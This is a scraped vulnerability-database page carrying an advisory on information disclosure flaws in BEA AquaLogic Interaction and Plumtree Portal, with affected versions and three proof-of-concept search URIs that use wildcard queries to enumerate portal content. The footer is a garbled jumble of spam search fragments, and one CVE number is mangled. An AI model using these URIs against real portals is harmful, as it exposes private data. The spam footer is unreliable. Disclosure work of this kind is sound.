about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , BEA AquaLogic Interaction Plumtree Portal Multiple Information Disclosure Vulnerabilities


Title BEA AquaLogic Interaction Plumtree Portal Multiple Information Disclosure Vulnerabilities
Published 2007-11-28-12:00AM
Updated 2007-12-05-04:52PM
Class Design Error
CVE   CVE-2007-6197 E-2007-6198
Remote  Yes
Local  No
Credit  Adrian Pastor <adrian.pastor [at] procheckup.com> and Jan Fry <jan.fry [at] procheckup.com> from ProCheckUp Ltd are credited with the discovery of these issues.
Vulnerable  BEA Systems Plumtree Foundation 5.0.4
BEA Systems Plumtree Foundation 5.0.3
BEA Systems Plumtree Foundation 5.0.2
BEA Systems Plumtree Foundation 6.0 SP1
BEA Systems Plumtree Foundation 6.0
BEA Systems AquaLogic Interaction 6.1 MP1
BEA Systems AquaLogic Interaction 6.0
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following proof-of-concept URIs are available:https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*&amp;in_hi_req_ apps=1&amp;control=advancedstart&amp;in_hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*admin*&amp;in_hi_ req_apps=1&amp;control=advancedstart&amp;in_hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*test*&amp;in_hi_req_apps= 1&amp;control=advancedstart&amp;in_ hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_topoperator=and
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 21:30:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
j...oolbar 2...n.com/ news for c www.xlxx.c Rahma Azar Modernbill cum schots 2...n.com/ www.xlxx.c %2Fimpex%2 news for c see for www.se trilha em 2...n.com/ news for c shop340001 TBDEV 2...n.com/ news for c Www.filmpo 2...n.com/ Rashma.Sex Www.sex 40 2...n.com/ news for c 200 /compo htmltonuke nackedwome news for c shop340001 IR3X 2...n.com/ sex free m www.filmne ldpinch.au 200 /compo Phone erot mambo Remo 2...n.com/ Pusy.ameri kaHT2 www,waptri bbs.ltdts. www.trish Eight 2....gr/LI 2...n.com/ news for c www.365pv.